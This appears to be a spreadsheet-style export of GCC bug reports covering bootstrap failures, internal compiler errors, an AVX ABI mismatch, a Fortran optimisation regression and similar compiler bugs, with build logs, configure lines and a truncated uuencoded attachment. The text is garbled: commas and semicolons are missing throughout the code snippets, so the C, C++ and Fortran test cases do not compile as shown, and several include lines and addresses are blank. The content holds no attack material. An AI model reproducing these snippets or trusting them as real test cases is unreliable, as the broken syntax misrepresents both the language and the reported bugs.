    <t>redhat linux 7.3 bootstrap failure when building gcc-2.95.2</t>
  </si>
  <si>
    <t>I got the tarball from gatekeeper.dec.com.
I did the following:
tar -xzf gcc-2.95.2.tar.gz
mkdir build-gcc-2.95.2
cd build-gcc-2.95.2/
../gcc-2.95.2/configure --prefix=/opt/electra/tools
make bootstrap
failed (see file attachment)
I need gcc-2.95.2 because I am building a specific tool
chain for embedded development for a JPL spacecraft...
Release:
unknown
Environment:
redhat linux 7.2 using gcc 2.9.6
How-To-Repeat:
build it...</t>
  </si>
  <si>
    <t>jeff.deifik</t>
  </si>
  <si>
    <t>GCC-3449</t>
  </si>
  <si>
    <t>segfault on compile</t>
  </si>
  <si>
    <t>After quite a bit of compilation I get:
.
.
.
echo int xxy_us_dummy &gt;tmp-dum.c
./xgcc -B./ -B/usr/local/powerpc-unknown-linux-gnu/bin/ -isystem /usr/local/powerpc-unknown-linux-gnu/include -S tmp-dum.c
cc1: Internal error: Segmentation fault
Please submit a full bug report
with preprocesses source if appropriate.
See  for instructions.
make[2]: *** [s-under] Error 1
make[2]: Leaving directory '/root/ppc-gcc/gcc'
make[1]: *** [stage1_build] Error 2
make[1]: Leaving directory '/root/ppc-gcc/gcc'
make: *** [bootstrap] Error 2
Release:
gcc-3.0 (compiled with gcc 2.95.3 20001130)
Environment:
LinuxPPC Q4 2000 (Kernel 2.2.18) on a G4 cube
How-To-Repeat:
../gcc-3.0/configure --with-cpu=powerpc
make bootstrap</t>
  </si>
  <si>
    <t>cas1650</t>
  </si>
  <si>
    <t>GCC-41261</t>
  </si>
  <si>
    <t>ice with -O2 -fprofile-arcs when compiling Linux kernel</t>
  </si>
  <si>
    <t>I just tried to compile Linux kernel version 2.6.31-rc8
with the gcc 4.5 mainline snapshot 20090903
and the compiler said
arch/x86/kernel/machine_kexec_64.c: In function 'machine_kexec':
arch/x86/kernel/machine_kexec_64.c:270:6: internal compiler error: in refs_may_alias_p_1 at tree-ssa-alias.c:831
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source attached. Flags -O2 -fprofile-arcs required.</t>
  </si>
  <si>
    <t>GCC-44948</t>
  </si>
  <si>
    <t>-msse/-mavx change ABI</t>
  </si>
  <si>
    <t>With two sources:
struct A { long b[8] __attribute__((aligned (32))) }
void foo (long double struct A)
int
main (void)
{
  struct A a = { { 0 1 2 3 4 5 6 7 } }
  foo (8.0L a)
  return 0
}
and:
struct A { long b[8] __attribute__((aligned (32))) }
void
foo (long double x struct A y)
{
  int i
  if (x != 8.0L)
    __builtin_abort ()
  for (i = 0 i &lt; 8 i++)
    if (y.b[i] != i)
      __builtin_abort ()
}
when one of these is compiled with -mavx while the other one is not the testcase ICEs while when -mavx is used in both or none of the compilations it works.
This is because ix86_function_arg_boundary returns 16 for -mno-avx while 32 for -mavx in this case.  Shouldn't it return &gt; 16 only if the mode is for 256-bit vector modes or aggregate which contains some 256-bit vector somewhere in it?</t>
  </si>
  <si>
    <t>GCC-17121</t>
  </si>
  <si>
    <t>[4.0 regression] Link problem with function-local classes</t>
  </si>
  <si>
    <t>$ g++ -v
Reading specs from
/data/scratch/devtools/gcc-3.5.0-pre-20040815/lib/gcc/i686-pc-linux-gnu/3.5.0/specs
Configured with: ../gcc-3.5-20040815/configure
--prefix=/data/scratch/devtools/gcc-3.5.0-pre-20040815 --enable-languages=cc++
--with-as=/data/scratch/binutils/2.15/bin/as
--with-ld=/data/scratch/binutils/2.15/bin/ld --enable-__cxa_atexit --disable-nls
i686-pc-linux-gnu
Thread model: posix
gcc version 3.5.0 20040815 (experimental)
$ cat test.cc
struct A {
    virtual ~A() {}
}
void tsk_tsk()
{
    struct B : public A {}
}
$ cat main.cc
int main() {}
$ g++ -W -Wall -c test.cc
$ g++ -W -Wall main.cc test.o
test.o(.text+0x19): In function `tsk_tsk()':
: undefined reference to `vtable for tsk_tsk()::B'
test.o(.text+0x1d): In function `tsk_tsk()':
: undefined reference to `tsk_tsk()::B::~B()'
test.o(.text+0x23): In function `tsk_tsk()':
: undefined reference to `vtable for tsk_tsk()::B'
test.o(.text+0x27): In function `tsk_tsk()':
: undefined reference to `tsk_tsk()::B::~B()'
collect2: ld returned 1 exit status
As far as I can tell this used to work with all releases of GCC.</t>
  </si>
  <si>
    <t>Richard.Kreckel</t>
  </si>
  <si>
    <t>GCC-34255</t>
  </si>
  <si>
    <t>[4.3 Regression] scope-blocks-on-a-diet patch diverges -g from non-g output code</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/ml/gcc-patches/2007-07/msg01745.html regresses the property that code output with -g must be the same as that without -g.  make bootstrap-debug demonstrates that several files miscompare after this patch and don't if the patch is reversed.
The patch not only causes -g divergence it also accidentally drops subblocks that need to be kept around for the sake of generating debug information for them.
Both problems are fixed with the patch at http://gcc.gnu.org/ml/gcc-patches/2007-10/msg00608.html</t>
  </si>
  <si>
    <t>GCC-738</t>
  </si>
  <si>
    <t>The displacement must be greater than or equal to -32768 and less than or equal to 32767</t>
  </si>
  <si>
    <t>When compiling a large C file on AIX 4.3 (RS/6000 7043 43P) the gcc compiler (2.95.2) displays error message -- The displacement must be greater than or equal to -32768 and less than or equal to 32767.
Thanks for your help!
Release:
unknown
Environment:
AIX 4.3
How-To-Repeat:
gcc -save-temps -DYY_USE_PROTOS -mcpu=common -mminimal-toc -I. -I./src/includes -I./src/machine/power/aix-3.2.5 -I./src/progs/util -c ./src/machine/power/aix-3.2.5/out.c -o src/../obj/machine/power/aix-3.2.5/out.o</t>
  </si>
  <si>
    <t>nzhu</t>
  </si>
  <si>
    <t>GCC-59449</t>
  </si>
  <si>
    <t>Missing online documentation web pages</t>
  </si>
  <si>
    <t>The below pages are not available
http://gcc.gnu.org/onlinedocs/gcc-4.8.2/gcc/i386-and-x86-64-Options.html#i386-and-x86-64-Options
http://gcc.gnu.org/onlinedocs/gcc-4.8.2/gcc/IA-64-Options.html#IA-64-Options
http://gcc.gnu.org/onlinedocs/gcc-4.8.2/gcc/i386-and-x86-64-Windows-Options.html#i386-and-x86-64-Windows-Options</t>
  </si>
  <si>
    <t>otmar.struwe</t>
  </si>
  <si>
    <t>GCC-80189</t>
  </si>
  <si>
    <t>translation</t>
  </si>
  <si>
    <t>gimplify.c: check whether parallel/task/teams should be translated</t>
  </si>
  <si>
    <t>from gimplify.c function omp_default_clause:
	const char *rtype
	if (ctx-&gt;region_type &amp; ORT_PARALLEL)
	  rtype = parallel
	else if (ctx-&gt;region_type &amp; ORT_TASK)
	  rtype = task
	else if (ctx-&gt;region_type &amp; ORT_TEAMS)
	  rtype = teams
	else
	  gcc_unreachable ()
	error (%qE not specified in enclosing %s
	       DECL_NAME (lang_hooks.decls.omp_report_decl (decl)) rtype)
	error_at (ctx-&gt;location enclosing %s rtype)
Should rtype be translated here? If so the string literals must be inlined into the diagnostic since they result in different grammar at least in German.
If they should not be translated they should be marked in the code as intentionally not translated since this code looks like an oversight.</t>
  </si>
  <si>
    <t>roland.illig</t>
  </si>
  <si>
    <t>GCC-53148</t>
  </si>
  <si>
    <t>[4.7 Regression] Incorrect intrinsic function parsing on labeled statements when compiled w/ -ffrontend-optimize</t>
  </si>
  <si>
    <t>Created attachment 27256
Compilation and .s files for -O0 and -O2 optimizations
Hi
There appears to be a gcc/gfortran-4.7.0 regression occurring for -O optimizations greater than -O0 related to the parsing of labeled statements containing expressions with repeated function calls. For example a statement like:
   10 x = dble(y)*dble(y)
will generate a compiler warning similar to
label_opt_issue.f:38:0: warning: '__var_1' is used uninitialized in this function [-Wuninitialized]
and at runtime the expression dble(y)*dble(y) will always evaluate to 0 regardless of the value of y.
Expected results are obtained when the code is compiled with default/no optimization but failure occurs when compiling with -O1 and above. There is nothing special about the use of intrinsic DBLE here the same behavior occurs for other intrinsic functions (user-defined functions work as expected). In addition if a more complicated expression is used for example
   10 x = (1.d0 + exp(y)*exp(y))/z
then the same compilation warning occurs and the value of x is evaluated as
      x = (1 + 0)/z = 1/z
that is exp(y)*exp(y) evaluates to 0 regardless of y.
This issue is not present in gcc/gfortran-4.6.3. The following program demonstrates the issue:
C label_opt_issue.f
      program main
          real x
          double precision xsq
          double precision test_func
          double precision work_around
          x = 5.
          xsq = test_func(x)
          write(**) function   x:  x     x*x:  xsq
          call test_subr(xxsq)
          write(**) subroutine x:  x     x*x:  xsq
          xsq = work_around(x)
          write(**) expected   x:  x     x*x:  xsq
          end program
      subroutine test_subr(xxsq)
          real x
          double precision xsq
          intrinsic dble
          goto 10
   10     xsq = dble(x)*dble(x)
          return
          end subroutine
      double precision function test_func(x)
          real x
          intrinsic dble
          goto 10
   10     test_func = dble(x)*dble(x)
          return
          end function
      double precision function work_around(x)
          real x
          intrinsic dble
          goto 10
   10     continue
          work_around = dble(x)*dble(x)
          return
          end function
Demonstration code output:
With -O1 to -O3 optimization:
$ ./label_opt_issue
 function   x:    5.00000000         x*x:    0.0000000000000000
 subroutine x:    5.00000000         x*x:    0.0000000000000000
 expected   x:    5.00000000         x*x:    25.000000000000000
With default optimization:
$ ./label_opt_issue
 function   x:    5.00000000         x*x:    25.000000000000000
 subroutine x:    5.00000000         x*x:    25.000000000000000
 expected   x:    5.00000000         x*x:    25.000000000000000
I have attached the label_opt_issue.f compilation logs and temp *.s files for for two cases: default optimization and -O2 optimization. 
I came across this issue building and testing SCIPY one test failed which really should not have and that lead me to a fortran routine using DBLE in the manner above which always evaluated to 0.
System info:
=== gcc/gfortran version/options/system type:
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-pc-linux-gnu/4.7.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: /home/bld/gcc-4.7.0-jps_src/gcc-4.7.0/configure --prefix=/usr --libexecdir=/usr/lib --with-gmp=/usr --with-mpfr=/usr --with-system-zlib --enable-shared --enable-checking=release --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --disable-bootstrap --enable-languages=cc++fortran --infodir=/usr/share/info --mandir=/usr/share/man
Thread model: posix
gcc version 4.7.0 (GCC)
system: Linux b-movie 3.3.3 #1 Sun Apr 22 21:11:23 EDT 2012 i686 GNU/Linux
glibc:  2.15
thanks for your time
John</t>
  </si>
  <si>
    <t>GCC-28050</t>
  </si>
  <si>
    <t>objc++</t>
  </si>
  <si>
    <t>ICE on invalid initializer</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since GCC 4.1.0:
======================
int i = [0]
======================
bug.m:1: error: expected ':' before ']' token
bug.m:1: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]
This also happens with the objc++ frontend.</t>
  </si>
  <si>
    <t>GCC-63788</t>
  </si>
  <si>
    <t>sanitizer</t>
  </si>
  <si>
    <t>ICE: SIGSEGV in contains_struct_check with -O -fsanitize=undefined on almost any fortran code</t>
  </si>
  <si>
    <t>Created attachment 33925
reduced testcase
Compiler output:
$ gcc -O -fsanitize=undefined testcase.f
==32638== Invalid read of size 2
==32638==    at 0xEA80B8: contains_struct_check (tree.h:2864)
==32638==    by 0xEA80B8: build_call_expr_loc_array(unsigned int tree_node* int tree_node**) (tree.c:10556)
==32638==    by 0xEA8240: build_call_expr_loc(unsigned int tree_node* int ...) (tree.c:10589)
==32638==    by 0xC62757: instrument_object_size(gimple_stmt_iterator* bool) (ubsan.c:1522)
==32638==    by 0xC664F0: (anonymous namespace)::pass_ubsan::execute(function*) (ubsan.c:1670)
==32638==    by 0xB4E9D8: execute_one_pass(opt_pass*) (passes.c:2269)
==32638==    by 0xB4EF85: execute_pass_list_1(opt_pass*) (passes.c:2321)
==32638==    by 0xB4EFD8: execute_pass_list(function* opt_pass*) (passes.c:2332)
==32638==    by 0xB4D734: do_per_function_toporder(void (*)(function* void*) void*) (passes.c:1638)
==32638==    by 0xB4F5C6: execute_ipa_pass_list(opt_pass*) (passes.c:2670)
==32638==    by 0x85A7B4: ipa_passes (cgraphunit.c:2049)
==32638==    by 0x85A7B4: symbol_table::compile() (cgraphunit.c:2172)
==32638==    by 0x85C357: symbol_table::finalize_compilation_unit() (cgraphunit.c:2325)
==32638==    by 0xAAF1C7: write_global_declarations() (langhooks.c:339)
==32638==  Address 0x0 is not stack'd malloc'd or (recently) free'd
==32638== 
testcase.f:3:0:
       end
 ^
internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Almost any fortran code causes this ICE.
Tested revisions:
r217250 - ICE</t>
  </si>
  <si>
    <t>GCC-1040</t>
  </si>
  <si>
    <t>accepts illegal code: cv-quals on member function pointers</t>
  </si>
  <si>
    <t>I gather from the discussion I started on clc++m  that 
the code in how-to-repeat is illegal 2.95.2 accepts it.
The problem is that the type:
    bool (bar::*)(const bar
should not be implicitely cast to:
    bool (bar::*)(const bar
for reasons that aren't entirely clear to me.
Release:
2.95.2
How-To-Repeat:
template  struct A {
     bool (T::*compare)(const T
     A() { compare =  }
}
struct bar { bool operator&lt;(const bar }
int main() {
    A abar
    return 0
}</t>
  </si>
  <si>
    <t>benoit.hudson</t>
  </si>
  <si>
    <t>GCC-7801</t>
  </si>
  <si>
    <t>Internal compiler error in cp_expr_size at cp/cp-lang.c</t>
  </si>
  <si>
    <t>On compiling the latest kdelibs cvs snapshot from kde.org I
got the following error and request to file a report.
make[3]: Entering directory `/usr/local/src/kde/3.1/kdelibs/kdecore'
source='kkeyserver_x11.cpp' object='kkeyserver_x11.lo' libtool=yes \
depfile='.deps/kkeyserver_x11.Plo' tmpdepfile='.deps/kkeyserver_x11.TPlo' \
depmode=gcc3 /bin/sh ../admin/depcomp \
/bin/sh ../libtool --silent --mode=compile --tag=CXX g++-3.2 -DHAVE_CONFIG_H -I. -I. -I.. -I../dcop -I../libltdl -I../kdecore -I../kdeui -I../kio -I../kio/kio -I../kio/kfile -I.. -I/opt/qt/3.0.4/include -I/usr/X11R6/include -I/opt/kde/3.0.6/include  -I/usr/include/libart-2.0   -DQT_THREAD_SUPPORT  -D_REENTRANT   -Wnon-virtual-dtor -Wno-long-long -Wbad-function-cast -Wundef -Wall -pedantic -W -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -ansi -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -Wcast-align -Wconversion -DNDEBUG -DNO_DEBUG -O2 -march=pentium4 -fno-exceptions -fno-check-new  -DQT_NO_TRANSLATION -DQT_CLEAN_NAMESPACE -DQT_NO_ASCII_CAST -DQT_NO_COMPAT  -c -o kkeyserver_x11.lo `test -f 'kkeyserver_x11.cpp' || echo './'`kkeyserver_x11.cpp
kkeyserver_x11.cpp: In function `void
   __static_initialization_and_destruction_0(int int)':
kkeyserver_x11.cpp:73: Internal compiler error in cp_expr_size at cp/cp-lang.c
   :130
Please submit a full bug report
Release:
gcc-3.2.1
Environment:
npg@eurotrash:/usr/local/src/kde/3.1/kdelibs$ gcc-3.2 -v
Reading specs from /usr/lib/gcc-lib/i386-linux/3.2.1/specs
Configured with: /mnt/data/gcc-3.1/gcc-3.2-3.2.1ds0/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.2 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.2.1 20020830 (Debian prerelease)
autoconf environment for i686 Debian GNU/Linux
xport KDEDIR=/opt/kde/3.0.6
export QTDIR=/opt/qt/3.0.4
export LD_LIBRARY_PATH=$KDEDIR/lib:$QTDIR/lib
export PATH=$KDEDIR/bin:$QTDIR/bin:$PATH
export CC=gcc-3.2
export CXX=g++-3.2
export CFLAGS=-march=pentium4
export CXXFLAGS=$CFLAGS
alias kdeconfigure=CC=$CC CXX=$CXX CFLAGS=$CFLAGS CXXFLAGS=$CXXFLAGS ./configure --prefix=$KDEDIR --disable-debug
export CVSROOT=:pserver:anonymous@anoncvs.kde.org:/home/kde
How-To-Repeat:
autoconf arts with g++-3.2 compile and install.
cvs -d :pserver:anonymous@anoncvs.kde.org:/home/kde co kdelibs
autoconf with g++-3.2 compile and install.
error should just appear as stated above.</t>
  </si>
  <si>
    <t>GCC-5506</t>
  </si>
  <si>
    <t>Include of  fails on FreeBSD 3.4 due to use of _T identifier</t>
  </si>
  <si>
    <t xml:space="preserve">FreeBSD 3.4's  defines a macro _T. Then when _T is used as a template parameter (in include/g++-3/std/mask_array.h and /include/g++-3/std/slice_array.h) it is expanded to an implementation-defined constant and bad things happen.
Release:
gcc-2.95.x (also verified on 2.95 branch of CVS)
Environment:
FreeBSD 3.4
How-To-Repeat:
#include </t>
  </si>
  <si>
    <t>gregod</t>
  </si>
  <si>
    <t>GCC-4321</t>
  </si>
  <si>
    <t>gcc 3.01 can't bootstrap libstdc++ on m68k-openbsd system</t>
  </si>
  <si>
    <t>gcc 3.0.1 can't bootstrap itself correctly on OpenBSD m68k-based systems.
cc1plus will abort with an ICE while compiling libstdc++v3.
The setup is the gcc stable port appearing in the OpenBSD port collection
maintained by Marc Espie . This was checked out on
2001/09/12 and it comes with a couple of patches you can check via anoncvs on
  http://www.openbsd.org/cgi-bin/cvsweb/ports/lang/egcs/stable/patches
Besides some i386-specific patches they basically are there to make sure the
host system configuration is correctly recognized.
Initial gcc used for first stage bootstrap is:
$ gcc -v
Reading specs from /usr/lib/gcc-lib/m68k-unknown-openbsd2.9/2.95.3/specs
gcc version 2.95.3 20010125 (prerelease)
Then gcc 3.0.1 was configured as:
$ xgcc -v
Using builtin specs.
Configured with: /ports/lang/egcs/stable/w-gcc-3.0.1-core/gcc-3.0.1/configure --verbose --program-transform-name=s^e --disable-nls --enable-cpp --enable-languages=cc++ --with-gnu-as --with-gnu-ld --enable-shared --prefix=${DESTDIR}/usr/local --sysconfdir=${DESTDIR}/etc
Thread model: single
gcc version 3.0.1
The failing file is libstdc++-v3/src/c++locale.cc which is a link produced
during the configuration phase to libstdc++-v3/config/c_locale_generic.cc
Preprocessed output (c++locale.ii) is attached.
The failing command is:
#cd /usr/src/ports/gcc-3.0.1-core/build-m68k/m68k-unknown-openbsd2.9/libstdc++-v3/src
Here comes the output of the previous command with -v and -save-temps added to
the xgcc arguments:
Reading specs from /usr/src/ports/gcc-3.0.1-core/build-m68k/gcc/specs
Configured with: /ports/lang/egcs/stable/w-gcc-3.0.1-core/gcc-3.0.1/configure --verbose --program-transform-name=s^e --disable-nls --enable-cpp --enable-languages=cc++ --with-gnu-as --with-gnu-ld --enable-shared --prefix=${DESTDIR}/usr/local --sysconfdir=${DESTDIR}/etc
Thread model: single
gcc version 3.0.1
=OpenBSD -Acpu=m68k -Amachine=m68k -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Wall -Wno-format -W -Wwrite-strings -Winline -D__HAVE_68881__ -D__HAVE_FPU__ -isystem /usr/local/m68k-unknown-openbsd2.9/include c++locale.cc c++locale.ii
ignoring nonexistent directory /usr/local/m68k-unknown-openbsd2.9/bin/include
ignoring nonexistent directory /usr/local/m68k-unknown-openbsd2.9/lib/include
ignoring nonexistent directory /usr/local/m68k-unknown-openbsd2.9/include
GNU CPP version 3.0.1 (cpplib) (68k MIT syntax)
ignoring nonexistent directory /usr/src/ports/gcc-3.0.1-core/build-m68k/lib/gcc-lib/m68k-unknown-openbsd2.9/3.0.1/include
ignoring nonexistent directory /usr/src/ports/gcc-3.0.1-core/build-m68k/lib/gcc-lib/m68k-unknown-openbsd2.9/3.0.1/../../../../m68k-unknown-openbsd2.9/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/m68k-unknown-openbsd2.9/3.0.1/include
ignoring nonexistent directory /usr/local/lib/gcc-lib/m68k-unknown-openbsd2.9/3.0.1/../../../../m68k-unknown-openbsd2.9/include
#include ... search starts here:
#include  search starts here:
 /usr/src/ports/gcc-3.0.1-core/build-m68k/m68k-unknown-openbsd2.9/libstdc++-v3/include/m68k-unknown-openbsd2.9
 /usr/src/ports/gcc-3.0.1-core/build-m68k/m68k-unknown-openbsd2.9/libstdc++-v3/include
 /ports/lang/egcs/stable/w-gcc-3.0.1-core/gcc-3.0.1/libstdc++-v3/libsupc++
 /ports/lang/egcs/stable/w-gcc-3.0.1-core/gcc-3.0.1/libstdc++-v3/libmath
 /usr/src/ports/gcc-3.0.1-core/build-m68k/gcc/include
 /usr/local/include
 /usr/include
End of search list.
 /usr/src/ports/gcc-3.0.1-core/build-m68k/gcc/cc1plus -fpreprocessed c++locale.ii -quiet -dumpbase c++locale.cc -g -g -O2 -Wall -Wno-format -W -Wwrite-strings -Winline -version -fno-implicit-templates -fdiagnostics-show-location=once -o c++locale.s
GNU CPP version 3.0.1 (cpplib) (68k MIT syntax)
GNU C++ version 3.0.1 (m68k-unknown-openbsd2.9)
	compiled by GNU C version 3.0.1.
xgcc: Internal error: Illegal instruction (program cc1plus)
Please submit a full bug report.
See  for instructions.
Here follows generated c++locale.ii gziped uuencoded
begin 644 c++locale.ii.gz
M'XL(+8@H3L`VK*VQO8V%L92YI:0#L_7]SVSBR*`S_KT_!9.KX2+:&lt;6++C
M))MK=T]NT]-U&lt;[94SMSGGO?FB?+HB7:YD8B-225.)OQ?/87O]'X25B9#OC
MN&gt;=N+!!H-!J-[D:CT?@N.CZ-7DX/#N%-)FGKZ3E[WOHE'T\O6J*E]7Y?3U
MLBCKZO7-='IX_.KHU&gt;AP6I3IZZM5-I\=+D[??7R-_^=PE7_B\_Y8%\ZMJ
M-G[U_O4\NZKJ&amp;8)\^.GX=99/YZM9^IKV\C(:H4Z.M]W+-@=RE2%8J#AF=+ME
M8WJWPPZ/&gt;UL?(&gt;WL^O.#!#UN/4A*CUN=X2NR@0/5'=:Y-?9#1CYR&lt;-C&lt;OQ@
M!FJ&gt;)9&gt;9WE:`8J\&gt;7B*C!^22^9`OT#/+V&lt;1#DN^CD:'?+=/R`E5EYR$
MTX?'Y+B7)XNT6B3-$)P&gt;E][451_6:9H4597N]'&lt;3QEHGS2N\?S-?IFYDNH
MJJFQ/-[MLL^V@T1?I`D!8].*3-03%`:\*IOE0Z5O2_3D&lt;Y?M/Q-U]O7OO
MK:3P=8`(VEV_+X1[IC7/'*B.'8@B:)-E4(UJ@9UOAT8^IS
M6.^Z8#.)6_?I0Q@RG#\[0G7JBZS_@\RW.NK0=S._N+==
MKN4'G]GLPM&amp;3C83%LLM72SG29V&gt;3^=)547QGV^3\J=+]%5&lt;K5M(ZFJ2N
MRP1!G/1@BTM+C7/\]^6$*U0%=N'N.\H_N&lt;B10*G_:8X(*D+LJ)HP7!:!C)
M@I](3]&amp;%TB]#?$@@L_^T7E$+T1FO'T%4KI(JF[+U0+%A9BW\0$&lt;8B5J]7=BX
MNU^G@+8[6ZE:GSMP`AM[OL\WA7@YPA3M[M?D7V&gt;6RS)B%&amp;Q'X2MHQ9
M9/]!&gt;D[S*HBB&lt;=#47`.W2CEI@3UZM*S+
M679]'==8@/$/*P3R)D]GI$:5_3O%GW=CU2K(VM34JD++)3H[`XC+0H[K_&lt;[X
M6I7$.S#2'`)#3C80890?W%6VL9:LBQ=0B51Y^6O[M
MM0N[DV.G[7!%2\\2'H:CUMH%@O?2N3LL\&gt;OGGE]'7WJ&lt;BFT7[BW0QO2VC
M/K(DJSJB94.\8(=LQ0XF/Q\&lt;W%4J^G_A(-).CEEZ@?6GE1?$K#:U=I+2NK
M^&amp;*U'^VCT2/+#&amp;%?G&amp;`])=220Z?5T7@V+#Q=SEL!RA&gt;L9C/&amp;VK*3C%A')7H
M.`C$:IF'0DS+LD`#H:A+$/-4@P#Y$X:-/ZOKI8*-_[ARFK?RJOP8.EKW
MKFAMR`&gt;^K_0JG7QL9FG4*6X=(V&lt;_JO.]-UUN6BD%/H/3\95RX5X-2W(-A5
M'%7_G9:%7%8*#UQ?5YR]*&gt;D!RI=94J7-:U)Q6RU
M-!8`6!XA*P!6#V!HCY4&gt;5'4D*QH2$J\H!!V)9(E2YY]SYN1E97N&gt;3UN?
M[Q&gt;HC8EDKR&lt;TBQ#)6(*DN]F5F%(8!
MR:B%18/&gt;$(DVK&lt;@L03)(PPFI3*T.41I:&amp;=(8Q%&lt;!!W-+G2E9/D?V5G`^^@G
M_4)6-SZD6Y*%BD_K..NBO_!JO@U*M-ZA2P/UH(PHS60'TN1&lt;+^91_!&amp;`PI
M`-QR$MWWM(_561[S!CH&gt;!`+&amp;HQH-7#A@
M-&gt;5``G]2L`!0[*L3Q?T?PXLT/^M2172I`H]]O?
M.RSAW5J9\5CB)JA6&amp;QU@K&amp;7(BO$4+?&gt;S^X\@\H4OMUA
ME\&gt;/*@CNW0Y'/GXPQ^_[G8_R9/1`+`5\H8+%J/JU%7#[8CE+%'W3RSE?+
M[XC2@'D=46'_FHM?=HFF-RI]'
M'R:]^VB?59@83&gt;?)53I'EJ9LB4V&lt;3\G\Y]$TI15L/JEYP4R7CXMX@+M=:
M5W)6X2YA5XUD-BO=`)^SY\X=$=KT3GY3U`5B'/C3H=U8`Y.LJOBN?Z4
M1Z6C4VLK^IV`]=\2J+[OXK/X3JA$_@=].SWQS!/Y'])#
M0#6S%NL:V:HW656G)3W0&gt;-&gt;T)L69RGO?`F&gt;+HWM/^IM1&lt;[=NR9+FLRS)0R/(
M]-JH]_?^&gt;F[I8L(RQ:Q2K8V@&gt;NN%)(CRYFUCCXI777!O=%L75^GQ..J+HL&amp;D
M)Y8_3PZ99]Q$?]6E^E=7'KDT^ZZW5SN?^SN&gt;&gt;SN?^SN&gt;VSHF7Z?3(/]?C
MAJAL^:M5?N:2#/WU
MRRJ9:9*6?-'+Z&gt;]H/_J%*R7QB7H0HZFNK3A?S)P?TD^*O!:&lt;=)W=+6O[IYML
M9O^0Y07\0$^?UB5:\B)VL]B_8#?'1ANPRL]?WP^6K^
MT3ZE6MHJRI%FX19984'/Z(E&lt;MQD#-HH%QN_
M8D&gt;[*J8?YVGNLZ*FA^*.G6&lt;=$4I&amp;M2ZA^D1B_H
M03]\&gt;2HO:EMU2.CDP#EJF@(@D0TK]+T(SL=(7PE.:V8IYSNR_*0&gt;
M%O`Z1`Z/3MM`5VILWB15!\-(Y.:V&gt;@K/G55C:KCOZM8KQI^KG?[X_?G`ZB
M@PC]A:&gt;TN.ZS2@D4]X-!M%A-$+_^SIR?!\0&gt;YWV-+V`_XC_R`
M=F%QZ3V^'?LVC)SZE%&gt;P6XY9FB-?*[ZBJNKU368*U4Y[&lt;=7244./N1^B6QO
M..^CD)0DYW]]?N__I[&lt;5&amp;9I-@=8JV.-KZXUJ/.K
M:SJFGBBGYX[QM@^9MKX^ZAX7E3I@)]5#HSO99K!N`H4SF:%*NS!2NCI&lt;W
MJ$X_Z-49Z]E5J&lt;#_9A4[:'G&amp;OGJ:N(D_4JG_:J$D-3J-+J^N?C#RYP&lt;8Z_
MX_VX$Y?Y%?Q(&gt;D0ZDLZ#1B*VY\8K'O//1`M.83\(:V$6^_D#X\[QR+MPS`B7
MZ3Q-\#E7U?`^'L-9EOO1`)):.(QE6HA==S9/IA3=I/64H?'R4LX'X+@6
MUZCDD3(1]P($_&gt;:.ZT0ENER7ZYUIVIK9X]&gt;J5J+CF*I]\0^5WI.HP&lt;[T
MKO%*T&amp;$Y+\Z\F7:A+Z.1#5-\I!14`W*JV$%K^A0_+F0WTTE6VES0SLT1L
MANLZQ6$]`D4FDG%I`8HY%C8!A?A\1(BU:!G$*C01BW$ROJ
M2Q7GB%&lt;GO)!%`Z!B5#K/JAHO(HDEHRG+3S$6&lt;A%=!?GX'*L:2OR4OL0YG2
M2_K)Q)&gt;[^=UH8R_9SEXUNC'-LR-.@C+3&amp;&lt;DK.N!*6D=:?+%]MP75().5
MG26Y*BM&amp;MMJTTWJQQ&amp;I.FWA4BL@II[L$W/*..9R3
M[ZS&gt;0`5.RKWXZ13@%-D4ES1_?2W6A97+4OY!6VF2J4%$T&lt;S*HUH5(Y%
MAB+JYW!=$[ZYQCL..CQXEEZMEP3)=&lt;2GNJ8`DQU
MIL=+#WPS^8%)$U'&lt;1=8NH`/E/'1R?!X6!)1I+6'D=7J@A_\5Q4M=E=K6J
MTSCN]^/XNB@721W'49^C872-@A0:&lt;YS238F?($:*V]24Z9^UBFGVP#T
MCV6@OD6D^ZS3HTYS?0UR%=-W8^'T0FA
M.SU4:9I&gt;GR/GX7
MO+R9^%SE6KX:0&amp;\J-T\Z9=*!#*C]@X?!_C-D$=HU(%0
M:TL&gt;E7[R&amp;Y@N=8=:?B:+55WP$H.J3NILRL.?6!L7OOD[REO%\'\+0203P\
MC)&gt;'E_'GZ/(B.HI^_37JR]_D+[:9C?VZH8Q-/HQ47TG_]?_I\#DPU8(!7:
M6.*VRX.#((?^[TYT&gt;\KN#1^G^5/[F
M[AA0Q#&gt;92C6B7902M+U4?^OAEW1CJ91@[:T7(`3T(K4`4T!%F&lt;@WM6BE`&lt;8&amp;
MNU*`-WI:@0Q[4@K(M@F6Z-F1HQ6I$!=&amp;N0T1ZT/FID_
M6I$EFY7U!++0Z7:A1H)5\THMCL#$MLD:$4()5AMP&gt;PY).%
M3Y9B@0.Y/&gt;-M!:&gt;'SD.TD^@I%C3U\*FO=C):+Q(W]6TI@\=&amp;1^'Q&gt;)A
MZ7(UYR2CNOD&gt;!RK)RIQ3'^C%1!O$&amp;Y1T]B!B/1H\#4\/JZDE\DVF=?4KC
M)=OP$J7.S)PC+-Z\C&gt;E@\:88VT0::+]:UPS%_0(42ZP\%B!?&lt;\8NN/&amp;6
M(V/#!:!A\8'\'3SB^_')(OBFJA'_D7?^2$3J)/.&amp;*2X0/5(=8/J&amp;#.
M%D![8$(:B
M6Q[Y-8I_C*^*8I[E[&lt;)VBX&lt;W1T='8TF34UFZ917'C=6OL[NTAFO?M)8_3:]
